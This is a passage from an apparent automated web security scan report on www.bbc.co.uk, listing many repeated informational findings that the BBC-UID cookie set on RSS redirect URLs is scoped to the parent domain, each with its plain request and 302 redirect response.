<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.bbc.co.uk/news/business-12428689">he
...[SNIP]...

2.5. http://www.bbc.co.uk/go/rss/int/news/-/news/business-12431066  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /go/rss/int/news/-/news/business-12431066

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/rss/int/news/-/news/business-12431066 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Date: Sat, 12 Feb 2011 02:02:21 GMT
Location: http://www.bbc.co.uk/news/business-12431066
Keep-Alive: timeout=4, max=200
Connection: close
Set-Cookie: BBC-UID=e40d05b58e6ac2cdaf50e8baa1c5ffaddef3626da050a164149f39d70d56a16f0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 11-Feb-15 02:02:21 GMT; path=/; domain=bbc.co.uk;
Content-Length: 227

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.bbc.co.uk/news/business-12431066">he
...[SNIP]...

2.6. http://www.bbc.co.uk/go/rss/int/news/-/news/business-12431281  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /go/rss/int/news/-/news/business-12431281

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/rss/int/news/-/news/business-12431281 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Date: Sat, 12 Feb 2011 02:02:21 GMT
Location: http://www.bbc.co.uk/news/business-12431281
Keep-Alive: timeout=4, max=194
Connection: close
Set-Cookie: BBC-UID=64ddd595fe2af25d8e9c00577167ac462ebfe6e680e0c124d49f24b628303eba0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 11-Feb-15 02:02:21 GMT; path=/; domain=bbc.co.uk;
Content-Length: 227

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.bbc.co.uk/news/business-12431281">he
...[SNIP]...

2.7. http://www.bbc.co.uk/go/rss/int/news/-/news/business-12434447  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /go/rss/int/news/-/news/business-12434447

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/rss/int/news/-/news/business-12434447 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Date: Sat, 12 Feb 2011 02:02:21 GMT
Location: http://www.bbc.co.uk/news/business-12434447
Keep-Alive: timeout=4, max=124
Connection: close
Set-Cookie: BBC-UID=e4fd75a5aeaab2cdbecc50f8b14a5636a812441720406114848fc41638f03e2a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 11-Feb-15 02:02:21 GMT; path=/; domain=bbc.co.uk;
Content-Length: 227

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.bbc.co.uk/news/business-12434447">he
...[SNIP]...

2.8. http://www.bbc.co.uk/go/rss/int/news/-/news/business-12434453  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /go/rss/int/news/-/news/business-12434453

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/rss/int/news/-/news/business-12434453 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Date: Sat, 12 Feb 2011 02:02:21 GMT
Location: http://www.bbc.co.uk/news/business-12434453
Keep-Alive: timeout=4, max=184
Connection: close
Set-Cookie: BBC-UID=64dd45c58e2a220d5efcc0f9e19cca8914bcdb88f040d194544fb4a638202eca0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 11-Feb-15 02:02:21 GMT; path=/; domain=bbc.co.uk;
Content-Length: 227

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.bbc.co.uk/news/business-12434453">he
...[SNIP]...

2.9. http://www.bbc.co.uk/go/rss/int/news/-/news/business-12435838  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /go/rss/int/news/-/news/business-12435838

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/rss/int/news/-/news/business-12435838 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Date: Sat, 12 Feb 2011 02:02:22 GMT
Location: http://www.bbc.co.uk/news/business-12435838
Keep-Alive: timeout=4, max=178
Connection: close
Set-Cookie: BBC-UID=240d45354e4a329e8a46c44671921e3579f0406e9050a184e47f4022ec18388c0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 11-Feb-15 02:02:22 GMT; path=/; domain=bbc.co.uk;
Content-Length: 227

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.bbc.co.uk/news/business-12435838">he
...[SNIP]...

2.10. http://www.bbc.co.uk/go/rss/int/news/-/news/business-12437194  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /go/rss/int/news/-/news/business-12437194

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/rss/int/news/-/news/business-12437194 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Date: Sat, 12 Feb 2011 02:02:22 GMT
Location: http://www.bbc.co.uk/news/business-12437194
Keep-Alive: timeout=4, max=179
Connection: close
Set-Cookie: BBC-UID=b43da5b51e1aa20e5eacf0afc19548b7dc5aa148300021a4f48f6476e8404eba0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 11-Feb-15 02:02:22 GMT; path=/; domain=bbc.co.uk;
Content-Length: 227

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.bbc.co.uk/news/business-12437194">he
...[SNIP]...

2.11. http://www.bbc.co.uk/go/rss/int/news/-/news/education-12429152  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /go/rss/int/news/-/news/education-12429152

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/rss/int/news/-/news/education-12429152 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Date: Sat, 12 Feb 2011 02:02:23 GMT
Location: http://www.bbc.co.uk/news/education-12429152
Keep-Alive: timeout=4, max=197
Connection: close
Set-Cookie: BBC-UID=84fdd5159ecaa24f72ece65fa1e56a4b3e791499f090e11454bf9adff5c19c8c0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 11-Feb-15 02:02:23 GMT; path=/; domain=bbc.co.uk;
Content-Length: 228

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.bbc.co.uk/news/education-12429152">h
...[SNIP]...

2.12. http://www.bbc.co.uk/go/rss/int/news/-/news/entertainment-arts-12426999  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /go/rss/int/news/-/news/entertainment-arts-12426999

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/rss/int/news/-/news/entertainment-arts-12426999 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Date: Sat, 12 Feb 2011 02:02:24 GMT
Location: http://www.bbc.co.uk/news/entertainment-arts-12426999
Keep-Alive: timeout=4, max=196
Connection: close
Set-Cookie: BBC-UID=d44df505eeea4350888fc1df110f1ed03dc59d3410e07194f4af2436d35a19fa0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 11-Feb-15 02:02:24 GMT; path=/; domain=bbc.co.uk;
Content-Length: 237

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.bbc.co.uk/news/entertainment-arts-12
...[SNIP]...

2.13. http://www.bbc.co.uk/go/rss/int/news/-/news/entertainment-arts-12427905  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /go/rss/int/news/-/news/entertainment-arts-12427905

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/rss/int/news/-/news/entertainment-arts-12427905 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Date: Sat, 12 Feb 2011 02:02:24 GMT
Location: http://www.bbc.co.uk/news/entertainment-arts-12427905
Keep-Alive: timeout=4, max=200
Connection: close
Set-Cookie: BBC-UID=c46d8575ae4af330bff0394fc1e1677650114d72b0e0f13414cff9078d46a1cf0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 11-Feb-15 02:02:24 GMT; path=/; domain=bbc.co.uk;
Content-Length: 237

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.bbc.co.uk/news/entertainment-arts-12
...[SNIP]...

2.14. http://www.bbc.co.uk/go/rss/int/news/-/news/entertainment-arts-12428196  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /go/rss/int/news/-/news/entertainment-arts-12428196

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/rss/int/news/-/news/entertainment-arts-12428196 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Date: Sat, 12 Feb 2011 02:02:24 GMT
Location: http://www.bbc.co.uk/news/entertainment-arts-12428196
Keep-Alive: timeout=4, max=195
Connection: close
Set-Cookie: BBC-UID=c4ed35856e8a43c00fa05a80c18bc48a73cd8815c000b13464ffc937cd7611cf0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 11-Feb-15 02:02:24 GMT; path=/; domain=bbc.co.uk;
Content-Length: 237

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.bbc.co.uk/news/entertainment-arts-12
...[SNIP]...

2.15. http://www.bbc.co.uk/go/rss/int/news/-/news/health-12401970  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /go/rss/int/news/-/news/health-12401970

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/rss/int/news/-/news/health-12401970 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Date: Sat, 12 Feb 2011 02:02:27 GMT
Location: http://www.bbc.co.uk/news/health-12401970
Keep-Alive: timeout=4, max=183
Connection: close
Set-Cookie: BBC-UID=f4cd15254e3ac3d30e0c42fd416808b364f49995d010d1b4b44fb4a6b8f01eaa0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 11-Feb-15 02:02:27 GMT; path=/; domain=bbc.co.uk;
Content-Length: 225

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.bbc.co.uk/news/health-12401970">here
...[SNIP]...

2.16. http://www.bbc.co.uk/go/rss/int/news/-/news/health-12409700  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /go/rss/int/news/-/news/health-12409700

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/rss/int/news/-/news/health-12409700 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Date: Sat, 12 Feb 2011 02:02:28 GMT
Location: http://www.bbc.co.uk/news/health-12409700
Keep-Alive: timeout=4, max=199
Connection: close
Set-Cookie: BBC-UID=549d25e52e7a03241e0ce303a1895ec9c0b7506ba0609114d42fe426b8308e3a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 11-Feb-15 02:02:28 GMT; path=/; domain=bbc.co.uk;
Content-Length: 225

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.bbc.co.uk/news/health-12409700">here
...[SNIP]...

2.17. http://www.bbc.co.uk/go/rss/int/news/-/news/health-12415801  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /go/rss/int/news/-/news/health-12415801

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/rss/int/news/-/news/health-12415801 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Date: Sat, 12 Feb 2011 02:02:29 GMT
Location: http://www.bbc.co.uk/news/health-12415801
Keep-Alive: timeout=4, max=165
Connection: close
Set-Cookie: BBC-UID=549da5e5eeba9395f91e02e0513c2f9c5df1c35400506194143f46dff0a4ef350Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 11-Feb-15 02:02:29 GMT; path=/; domain=bbc.co.uk;
Content-Length: 225

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.bbc.co.uk/news/health-12415801">here
...[SNIP]...

2.18. http://www.bbc.co.uk/go/rss/int/news/-/news/magazine-12392811  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /go/rss/int/news/-/news/magazine-12392811

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/rss/int/news/-/news/magazine-12392811 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Date: Sat, 12 Feb 2011 02:02:30 GMT
Location: http://www.bbc.co.uk/news/magazine-12392811
Keep-Alive: timeout=4, max=187
Connection: close
Set-Cookie: BBC-UID=b42dc565ae8ad316be3cb32e81adcc251af9906f7090c194b4cfb4163890be7a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 11-Feb-15 02:02:30 GMT; path=/; domain=bbc.co.uk;
Content-Length: 227

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.bbc.co.uk/news/magazine-12392811">he
...[SNIP]...

2.19. http://www.bbc.co.uk/go/rss/int/news/-/news/magazine-12418046  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /go/rss/int/news/-/news/magazine-12418046

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/rss/int/news/-/news/magazine-12418046 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Date: Sat, 12 Feb 2011 02:02:30 GMT
Location: http://www.bbc.co.uk/news/magazine-12418046
Keep-Alive: timeout=4, max=166
Connection: close
Set-Cookie: BBC-UID=14ad05d58ebaa3063aa6474a91699a95ffe5a9e5902081e4249f4072fc88f85c0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 11-Feb-15 02:02:30 GMT; path=/; domain=bbc.co.uk;
Content-Length: 227

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.bbc.co.uk/news/magazine-12418046">he
...[SNIP]...

2.20. http://www.bbc.co.uk/go/rss/int/news/-/news/magazine-12428754  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /go/rss/int/news/-/news/magazine-12428754

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/rss/int/news/-/news/magazine-12428754 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Date: Sat, 12 Feb 2011 02:02:30 GMT
Location: http://www.bbc.co.uk/news/magazine-12428754
Keep-Alive: timeout=4, max=174
Connection: close
Set-Cookie: BBC-UID=848d8565ce7a3396080fe40b81006a2de68b6cff3010a114e4cfe4f6234a39ea0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 11-Feb-15 02:02:30 GMT; path=/; domain=bbc.co.uk;
Content-Length: 227

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.bbc.co.uk/news/magazine-12428754">he
...[SNIP]...

2.21. http://www.bbc.co.uk/go/rss/int/news/-/news/magazine-12428759  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /go/rss/int/news/-/news/magazine-12428759

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/rss/int/news/-/news/magazine-12428759 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Date: Sat, 12 Feb 2011 02:02:31 GMT
Location: http://www.bbc.co.uk/news/magazine-12428759
Keep-Alive: timeout=4, max=195
Connection: close
Set-Cookie: BBC-UID=543dc5551e1a63f7eb8716578196f967ecf1c70bc0502174e40fc9365f6ea0670Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 11-Feb-15 02:02:31 GMT; path=/; domain=bbc.co.uk;
Content-Length: 227

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.bbc.co.uk/news/magazine-12428759">he
...[SNIP]...

2.22. http://www.bbc.co.uk/go/rss/int/news/-/news/science-environment-12412662  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /go/rss/int/news/-/news/science-environment-12412662

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/rss/int/news/-/news/science-environment-12412662 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Date: Sat, 12 Feb 2011 02:02:32 GMT
Location: http://www.bbc.co.uk/news/science-environment-12412662
Keep-Alive: timeout=4, max=192
Connection: close
Set-Cookie: BBC-UID=646d45658e8a23d8ee4cf46d614015b0affe0afea050a174341fe446a8f05eea0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 11-Feb-15 02:02:32 GMT; path=/; domain=bbc.co.uk;
Content-Length: 238

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.bbc.co.uk/news/science-environment-1
...[SNIP]...

2.23. http://www.bbc.co.uk/go/rss/int/news/-/news/science-environment-12417858  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /go/rss/int/news/-/news/science-environment-12417858

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/rss/int/news/-/news/science-environment-12417858 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Date: Sat, 12 Feb 2011 02:02:32 GMT
Location: http://www.bbc.co.uk/news/science-environment-12417858
Keep-Alive: timeout=4, max=184
Connection: close
Set-Cookie: BBC-UID=d4bda5657e6aa3284efce48e31b0541b60c88298c050f174243f645648b0ceba0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 11-Feb-15 02:02:32 GMT; path=/; domain=bbc.co.uk;
Content-Length: 238

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.bbc.co.uk/news/science-environment-1
...[SNIP]...

2.24. http://www.bbc.co.uk/go/rss/int/news/-/news/science-environment-12424620  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /go/rss/int/news/-/news/science-environment-12424620

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/rss/int/news/-/news/science-environment-12424620 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Date: Sat, 12 Feb 2011 02:02:33 GMT
Location: http://www.bbc.co.uk/news/science-environment-12424620
Keep-Alive: timeout=4, max=187
Connection: close
Set-Cookie: BBC-UID=148dc555be9a6319084fb53d31d409cfc968e395f090517484ff3496e3ca792a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 11-Feb-15 02:02:33 GMT; path=/; domain=bbc.co.uk;
Content-Length: 238

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.bbc.co.uk/news/science-environment-1
...[SNIP]...

2.25. http://www.bbc.co.uk/go/rss/int/news/-/news/world-middle-east-12433758  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /go/rss/int/news/-/news/world-middle-east-12433758

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /go/rss/int/news/-/news/world-middle-east-12433758 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Server: Apache
Content-Type: text/html; charset=iso-8859-1
Date: Sat, 12 Feb 2011 02:02:34 GMT
Location: http://www.bbc.co.uk/news/world-middle-east-12433758
Keep-Alive: timeout=4, max=192
Connection: close
Set-Cookie: BBC-UID=940da5b5defa534afad659a251490a42549311c090d08164040f20f27c88786c0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 11-Feb-15 02:02:34 GMT; path=/; domain=bbc.co.uk;
Content-Length: 236

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.bbc.co.uk/news/world-middle-east-124
...[SNIP]...

